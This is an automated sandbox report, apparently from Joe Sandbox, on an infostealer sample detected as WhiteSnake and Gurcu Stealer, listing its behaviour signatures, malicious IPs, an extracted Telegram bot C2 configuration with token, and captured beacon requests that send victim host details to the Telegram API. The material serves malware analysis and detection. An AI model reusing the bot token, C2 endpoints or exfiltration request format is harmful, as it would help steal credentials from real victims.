Windows Analysis Report
jqOHOuPMJP.exe

Overview

General Information

Sample name:	jqOHOuPMJP.exe renamed because original name is a hash value
Original sample name:	7e9a93c69aecfc2bbda9470fbd4556db.exe
Analysis ID:	1390172
MD5:	7e9a93c69aecfc2bbda9470fbd4556db
SHA1:	ab0e810472a897affac1a761b49595939f6897a9
SHA256:	82e68bb4f56181a0b2458f2861aa7b5fa1bb0f4ce30907d579c3b92707ef2647
Tags:	exeWhiteSnakeStealer
Infos:

Detection

Gurcu Stealer, WhiteSnake Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Yara detected Gurcu Stealer

Yara detected Telegram RAT

Yara detected WhiteSnake Stealer

Adds a directory exclusion to Windows Defender

Disables UAC (registry)

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses netsh to modify the Windows network and firewall settings

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Communication To Uncommon Destination Ports

Sigma detected: Port Forwarding Activity Via SSH.EXE

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Schtasks From Env Var Folder

Tries to load missing DLLs

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Classification

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: http://216.250.190.139:80	Avira URL Cloud: Label: malware
Source: https://192.99.196.191:443	Avira URL Cloud: Label: malware
Source: http://66.42.56.128:80	Avira URL Cloud: Label: malware
Source: http://82.147.85.194/byte/@jokerbot880901.txt	Avira URL Cloud: Label: malware
Source: http://185.217.98.121:80	Avira URL Cloud: Label: malware
Source: https://44.228.161.50:443	Avira URL Cloud: Label: malware
Source: https://164.90.185.9:443	Avira URL Cloud: Label: malware
Source: http://18.228.80.130:80	Avira URL Cloud: Label: malware
Source: http://185.217.98.121:8080	Avira URL Cloud: Label: malware
Source: http://pesterbdd.com/i?	Avira URL Cloud: Label: malware
Source: http://82.147.85.194/byte/	Avira URL Cloud: Label: malware
Source: https://185.217.98.121:443	Avira URL Cloud: Label: malware
Source: http://116.202.101.219:8080	Avira URL Cloud: Label: malware
Source: http://206.189.109.146:80	Avira URL Cloud: Label: malware

Found malware configuration

Source: vkefq4cv.oil.exe.8072.18.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage"}
Source: vkefq4cv.oil.exe.8072.18.memstrmin	Malware Configuration Extractor: Gurcu Stealer {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349"}

Multi AV Scanner detection for domain / URL

Source: serveo.net	Virustotal: Detection: 7%	Perma Link
Source: http://216.250.190.139:80	Virustotal: Detection: 7%	Perma Link
Source: http://193.142.58.127:80	Virustotal: Detection: 6%	Perma Link
Source: http://66.42.56.128:80	Virustotal: Detection: 8%	Perma Link
Source: http://185.217.98.121:80	Virustotal: Detection: 15%	Perma Link
Source: https://164.90.185.9:443	Virustotal: Detection: 8%	Perma Link
Source: http://18.228.80.130:80	Virustotal: Detection: 10%	Perma Link
Source: http://185.217.98.121:8080	Virustotal: Detection: 11%	Perma Link

Multi AV Scanner detection for submitted file

Source: jqOHOuPMJP.exe	ReversingLabs: Detection: 13%
Source: jqOHOuPMJP.exe	Virustotal: Detection: 24%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: jqOHOuPMJP.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack	String decryptor: >{tnnsqc7~br
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack	String decryptor: >tyy`ejj/euh5tx,r
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack	String decryptor: 9s{tgd}b}~yr
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack	String decryptor: ,yqdr,j!)/$"+}$#.~!%-$'-,+rzy"$xz&'),##z)wr.-#
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack	String decryptor: fn{m8Gq}pjjf"gw~f+~~kg}{
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack	String decryptor: jkK\k
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack	String decryptor: -{whzMWg1sq&G
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack	String decryptor: fbnu8ci*OJ ~{~t
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack	String decryptor: faww8i}fpkdmmjq
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack	String decryptor: 3&k-m88"+89"+8:"+
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack	String decryptor: .dylpGul=`hz#o}
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack	String decryptor: flq8JSNR[YPQ
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack	String decryptor: 88r`bE:~!ba}<}!pvvfs\|1~q9o{d(us8:>!sme`''ml29o)r,c\|}!\|!vqr:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 11_2_00007FFD9B9784B1 CryptUnprotectData,	11_2_00007FFD9B9784B1
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 11_2_00007FFD9B9785FD CryptUnprotectData,	11_2_00007FFD9B9785FD
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 18_2_00007FFD9B9784A1 CryptUnprotectData,	18_2_00007FFD9B9784A1

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49744 version: TLS 1.2

Source: jqOHOuPMJP.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: WINLOA~1.PDBwinload_prod.pdbD966DD2-7850-423A-B1D8-7882CE1A6D15.log source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\system32\rsaenh.dll.pdb\| source: vkefq4cv.oil.exe, 00000012.00000002.2077754048.0000010DF0DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Drawing.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2a source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*TOP-A source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: cmd.exe, 00000005.00000003.1850351981.0000022BB8350000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdbWINLOA~1.PDB source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2S source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.pdb source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, WERCB81.tmp.dmp.41.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\vkefq4cv.oil.exe source: cmd.exe, 00000005.00000002.1851434800.0000022BB8158000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Core.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: mscorlib.pdb! source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Configuration.pdbx source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Windows.Forms.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: vkefq4cv.oil.exe, 00000012.00000002.2076526524.0000010DEFD37000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, WERCB81.tmp.dmp.41.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831EneJ source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: winload_prod.pdbWINLOA~1.PDBWINLOA~1.PDB source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*0 source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Management.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Drawing.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2E source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: C:\Users\Boss\Desktop\Laps\Laps\obj\Release\Laps.pdb source: jqOHOuPMJP.exe
Source:	Binary string: System.Management.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Core.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831o source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831n source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbR source: vkefq4cv.oil.exe, 00000012.00000002.2076526524.0000010DEFD0C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: ntkrnlmp.pdbl source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Code function: 4x nop then dec eax	4_2_00007FFD9B9A5133
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then dec eax	11_2_00007FFD9B974B99
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B981888h	11_2_00007FFD9B981353
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B98016Dh	11_2_00007FFD9B97FF54
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B974622h	11_2_00007FFD9B973E71
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B98B834h	11_2_00007FFD9B98B67A
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then dec eax	11_2_00007FFD9B973DA8
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B9775FCh	11_2_00007FFD9B9773F9
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B981FA1h	11_2_00007FFD9B981A79
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B97D1B7h	11_2_00007FFD9B97C2B7
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then dec eax	11_2_00007FFD9B97B97A
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B98E899h	11_2_00007FFD9B98E668
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then dec eax	11_2_00007FFD9B97F5EF
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B97D1B7h	11_2_00007FFD9B97CE3C
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B9745F6h	11_2_00007FFD9B974574
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B974622h	11_2_00007FFD9B974574
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then dec eax	18_2_00007FFD9B974B99
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B97D197h	18_2_00007FFD9B978B08
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B97CA9Ch	18_2_00007FFD9B978B08
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B97CC93h	18_2_00007FFD9B978B08
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B980CADh	18_2_00007FFD9B980A2E
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then dec eax	18_2_00007FFD9B97B95A
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B974622h	18_2_00007FFD9B973E71
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B98B814h	18_2_00007FFD9B98B678
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then dec eax	18_2_00007FFD9B975E3E
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B97EA38h	18_2_00007FFD9B97E4AE
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B981F81h	18_2_00007FFD9B981A59
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then dec eax	18_2_00007FFD9B97F85F
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B98E879h	18_2_00007FFD9B98E7BC
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B97D197h	18_2_00007FFD9B97CE1C
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B9745F6h	18_2_00007FFD9B974574
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B974622h	18_2_00007FFD9B974574
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B97771Ch	18_2_00007FFD9B977519
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then dec eax	42_2_00007FFD9B984B99
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then dec eax	42_2_00007FFD9B986690
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B984622h	42_2_00007FFD9B983E71
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B9845F6h	42_2_00007FFD9B984574
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B984622h	42_2_00007FFD9B984574
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B98771Ch	42_2_00007FFD9B987519
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then dec eax	44_2_00007FFD9B966AB0
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B96771Ch	44_2_00007FFD9B967519
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then dec eax	45_2_00007FFD9B996290
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B994622h	45_2_00007FFD9B9945E1
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B9945F6h	45_2_00007FFD9B994574
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 4x nop then jmp 00007FFD9B99730Ch	45_2_00007FFD9B997109

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, type: DROPPED

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49738 -> 185.119.118.59:8080

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe483612b93e055308d0c85f365c474ee.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe2111f95f52ba8be6b2d3394e38b1722.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /byte/@jokerbot880901.txt HTTP/1.1Host: 82.147.85.194Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 82.147.85.194 82.147.85.194
Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1

